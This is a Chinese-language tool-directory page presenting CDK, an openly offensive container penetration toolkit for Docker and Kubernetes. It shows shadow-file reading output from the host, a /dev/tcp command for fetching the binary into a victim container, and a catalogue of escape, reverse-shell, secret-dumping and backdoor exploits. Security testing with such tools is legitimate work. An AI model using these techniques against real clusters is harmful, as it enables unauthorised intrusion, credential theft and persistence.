Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CDK — 📦 使K8s、Docker和Containerd的安全测试更容易。 | Kitploit
工具/GitHubGitHub/cdk-team/cdk
权限提升侦察容器安全持久化机制漏洞利用横向移动后渗透利用渗透测试云安全容器逃逸
GitHubcdk-team/cdk

CDK

📦 使K8s、Docker和Containerd的安全测试更容易。

4.7k6063个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库网站

CDK - 零依赖容器渗透工具包

英文 | 简体中文

png

法律免责声明

未经事先双方同意,使用CDK攻击目标是违法的。CDK仅用于安全测试目的。

概述

CDK是一个开源的容器渗透工具包,旨在无需任何操作系统依赖的情况下,在不同的精简容器中提供稳定的利用。它附带了有用的网络工具和许多强大的PoC/EXP,帮助您轻松逃离容器并接管K8s集群。

快速开始

运行 cdk eva 获取评估信息和推荐的利用方式,然后运行 cdk run 开始攻击。

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

安装/投递

从 https://github.com/cdk-team/CDK/releases/ 下载最新版本发布。

将可执行文件放入目标容器并开始测试。

提示:在实际渗透测试中将CDK投递到目标容器

如果你有一个可以上传文件的利用,那么你可以直接上传CDK二进制文件。

如果你有一个RCE利用,但目标容器没有curl或wget,你可以使用以下方法投递CDK:

  1. 首先,在你的具有公网IP的主机上托管CDK二进制文件。
root@kitploit:~
(在你的主机上)
nc -lvp 999 < cdk
  1. 在受害容器内执行
root@kitploit:~
cat < /dev/tcp/(你的公网主机IP)/(端口) > cdk
chmod a+x cdk

用法

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

功能

CDK有三个模块:

  1. 评估:收集容器内信息以发现潜在弱点。
  2. 利用:用于容器逃逸、持久化和横向移动。
  3. 工具:用于TCP/HTTP请求、隧道和K8s集群管理的网络工具和API。

评估模块

用法

root@kitploit:~
cdk evaluate [--full]

利用模块

列出所有可用的利用:

root@kitploit:~
cdk run --list

运行目标利用:

root@kitploit:~
cdk run <script-name> [options]

关于精简版(Thin)的说明: 精简版发布是为短期存在的容器shell(如serverless函数)准备的。我们在源代码中添加了编译标签,并裁剪了一些利用以使二进制文件更轻量。2MB的文件包含了CDK 90%的功能,你也可以从CDK源码中选择有用的利用来构建自己的轻量级二进制文件。

工具模块

像在Linux中一样运行命令,输入参数略有不同,请参见用法链接。

root@kitploit:~
cdk nc [options]
cdk ps

发布文档

如果您想知道我们如何发布新版本、精简版是如何生成的、为什么提供upx版本、所有版本、普通版、精简版、upx版本之间的区别是什么,以及如何选择特定的CDK利用和工具来编译自己的发行版,请查看发布文档。

开发文档

  • 在容器中运行测试

为CDK做贡献

首先,感谢您花时间做出贡献!

感谢以下贡献者:

更多贡献者:贡献者列表

报告Bug

Bug通过GitHub Issues进行追踪。创建一个issue,包含当前的CDK版本、错误信息和运行环境。描述重现问题的精确步骤。

建议增强

增强建议通过GitHub Discussions进行追踪。您可以在此发布任何想法,直接与开发者讨论。

拉取请求(Pull Requests)

修复问题或维护CDK质量:

  • 描述当前的CDK版本、环境、问题以及重现问题的精确步骤。
  • 您修复问题前后运行的截图或日志。

新功能或利用:

  • 解释此增强为何对其他用户有用。
  • 请提供一个可持续的环境供我们审查贡献。
  • 关于此新功能如何工作的截图。
  • 如果您提交新的评估/利用脚本,请在PR消息中添加简单的文档,这里有一个示例。

活动

404StarLink 2.0 - Galaxy

png

CDK项目现已纳入404Team 星链计划2.0。加入星链社区与CDK开发团队取得联系。

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • 简报:"Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
下载工具
战术脚本支持用法/示例
信息收集OS基本信息✔链接
信息收集可用能力(Capabilities)✔链接
信息收集可用Linux命令✔链接
信息收集挂载点✔链接
信息收集网络命名空间✔链接
信息收集敏感环境变量✔链接
信息收集敏感进程✔链接
信息收集敏感本地文件✔链接
信息收集Kube-proxy 路由本地网络(CVE-2020-8558)✔链接
信息收集基于DNS的服务发现✔链接
发现K8s Api-server信息✔链接
发现K8s Service-account信息✔链接
发现云提供商元数据API✔链接
战术技术CDK利用名称支持精简版(Thin)支持文档
逃逸docker-runc CVE-2019-5736runc-pwn✔✔
逃逸containerd-shim CVE-2020-15257shim-pwn✔链接
逃逸docker.sock PoC (DIND攻击)docker-sock-check✔✔链接
逃逸docker.sock RCEdocker-sock-pwn✔✔链接
逃逸Docker API(2375) RCEdocker-api-pwn✔✔链接
逃逸设备挂载逃逸mount-disk✔✔链接
逃逸LXCFS逃逸lxcfs-rw✔✔链接
逃逸Cgroups逃逸mount-cgroup✔✔链接
逃逸滥用非特权用户命名空间逃逸 CVE-2022-0492abuse-unpriv-userns✔✔链接
逃逸Procfs逃逸mount-procfs✔✔链接
逃逸Ptrace逃逸PoCcheck-ptrace✔✔链接
逃逸重写Cgroup(devices.allow)rewrite-cgroup-devices✔✔链接
逃逸从主机系统读取任意文件 (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔链接
发现K8s组件探测service-probe✔✔链接
发现转储Istio Sidecar元数据istio-check✔✔链接
发现转储K8s Pod安全策略k8s-psp-dump✔链接
远程控制反弹Shellreverse-shell✔✔链接
远程控制Kubelet Execkubelet-exec✔✔
凭证获取镜像仓库暴力破解registry-brute✔✔链接
凭证获取访问密钥扫描ak-leakage✔✔链接
凭证获取Etcd获取K8s Tokenetcd-get-k8s-token✔✔
凭证获取转储K8s Secretsk8s-secret-dump✔✔链接
凭证获取转储K8s Configk8s-configmap-dump✔✔链接
权限提升K8s RBAC绕过k8s-get-sa-token✔✔链接
权限提升CVE-2026-31431 copy-fail (非root→root 仅x86_64)copy-fail-cve-2026-31431✔链接
持久化部署WebShellwebshell-deploy✔✔链接
持久化部署后门Podk8s-backdoor-daemonset✔✔链接
持久化部署影子K8s api-serverk8s-shadow-apiserver✔链接
持久化K8s MITM攻击 (CVE-2020-8554)k8s-mitm-clusterip✔✔链接
持久化部署K8s CronJobk8s-cronjob✔✔链接
命令描述支持用法/示例
ncTCP隧道✔链接
ps进程信息✔链接
netstat类似"netstat -antup"命令✔
ifconfig网络信息✔链接
vi编辑文件✔链接
ectl对etcd密钥的未授权枚举✔
kcurl向K8s api-server发送请求✔链接
dcurl向Docker HTTP API发送请求✔链接
ucurl向Docker Unix Socket发送请求✔链接
rcurl向Docker Registry API发送请求
probeIP/端口扫描✔链接